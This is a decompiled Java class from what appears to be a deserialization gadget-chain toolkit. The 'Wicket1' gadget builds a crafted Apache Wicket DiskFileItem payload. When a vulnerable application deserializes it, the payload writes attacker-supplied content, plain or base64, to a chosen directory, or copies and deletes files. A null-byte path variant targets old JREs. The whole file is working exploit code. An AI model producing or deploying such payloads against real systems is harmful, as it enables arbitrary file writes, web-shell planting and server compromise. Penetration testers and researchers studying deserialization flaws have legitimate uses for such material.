/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.gadget.impl.javanative.other;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.Reflections;
import java.io.File;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import org.apache.commons.codec.binary.Base64;
import org.apache.wicket.util.io.DeferredFileOutputStream;
import org.apache.wicket.util.io.ThresholdingOutputStream;
import org.apache.wicket.util.upload.DiskFileItem;

@GadgetTags(tags={"JavaNativeDeserialize", "END"})
@GadgetAnnotation(name="Wicket1", description="\u4e0a\u4f20\u7684\u6587\u4ef6\u540d\u4e0d\u53ef\u63a7(eg: upload_3805815b_2d50_4e00_9dae_a854d5a0e614_479431761.tmp), \u4ec5\u53ef\u63a7\u6587\u4ef6\u76ee\u5f55\u548c\u6587\u4ef6\u5185\u5bb9", dependencies={"org.apache.wicket:wicket-util:6.23.0", "org.slf4j:slf4j-api:1.6.4"}, authors={"jacob-baines"})
public class Wicket1
implements Gadget {
    @Param(name="payload\u7c7b\u578b", description="copyAndDelete;sourceFile;destDir\nwrite;destDir;ascii-data\nwriteB64;destDir;base64-data\nwriteOld;destFile;ascii-data\nwriteOldB64;destFile;base64-data", type=ParamType.Choice, choices={@Choice(value="copyAndDelete"), @Choice(value="write"), @Choice(value="writeB64"), @Choice(value="writeOld"), @Choice(value="writeOldB64")})
    public String type = "write";
    @Param(name="\u76ee\u6807\u6587\u4ef6\u76ee\u5f55")
    public String targetDir;
    @Param(name="\u6587\u4ef6\u5185\u5bb9", requires=false)
    public String content;

    public DiskFileItem getObject() throws Exception {
        if ("copyAndDelete".equals(this.type)) {
            return Wicket1.copyAndDelete(this.targetDir, this.content);
        }
        if ("write".equals(this.type)) {
            return Wicket1.write(this.targetDir, this.content.getBytes(StandardCharsets.US_ASCII));
        }
        if ("writeB64".equals(this.type)) {
            return Wicket1.write(this.targetDir, Base64.decodeBase64(this.content));
        }
        if ("writeOld".equals(this.type)) {
            return Wicket1.writeOldJRE(this.targetDir, this.content.getBytes(StandardCharsets.US_ASCII));
        }
        if ("writeOldB64".equals(this.type)) {
            return Wicket1.writeOldJRE(this.targetDir, Base64.decodeBase64(this.content));
        }
        throw new IllegalArgumentException("Unsupported command " + this.type);
    }

    @Override
    public Object invoke(GadgetContext context, GadgetChain chain) throws Exception {
        return this.getObject();
    }

    private static DiskFileItem copyAndDelete(String copyAndDelete, String copyTo) throws Exception {
        return Wicket1.makePayload(0, copyTo, copyAndDelete, new byte[1]);
    }

    private static DiskFileItem write(String dir, byte[] data) throws Exception {
        return Wicket1.makePayload(data.length + 1, dir, dir + "/whatever", data);
    }

    private static DiskFileItem writeOldJRE(String file, byte[] data) throws Exception {
        return Wicket1.makePayload(data.length + 1, file + "\u0000", file, data);
    }

    private static DiskFileItem makePayload(int thresh, String repoPath, String filePath, byte[] data) throws Exception {
        File repository = new File(repoPath);
        DiskFileItem diskFileItem = new DiskFileItem("test", "application/octet-stream", false, "test", 100000, repository, null);
        File outputFile = new File(filePath);
        DeferredFileOutputStream dfos = new DeferredFileOutputStream(thresh, outputFile);
        OutputStream os = (OutputStream)Reflections.getFieldValue(dfos, "memoryOutputStream");
        os.write(data);
        Reflections.getField(ThresholdingOutputStream.class, "written").set(dfos, data.length);
        Reflections.setFieldValue(diskFileItem, "dfos", dfos);
        Reflections.setFieldValue(diskFileItem, "sizeThreshold", 0);
        return diskFileItem;
    }
}

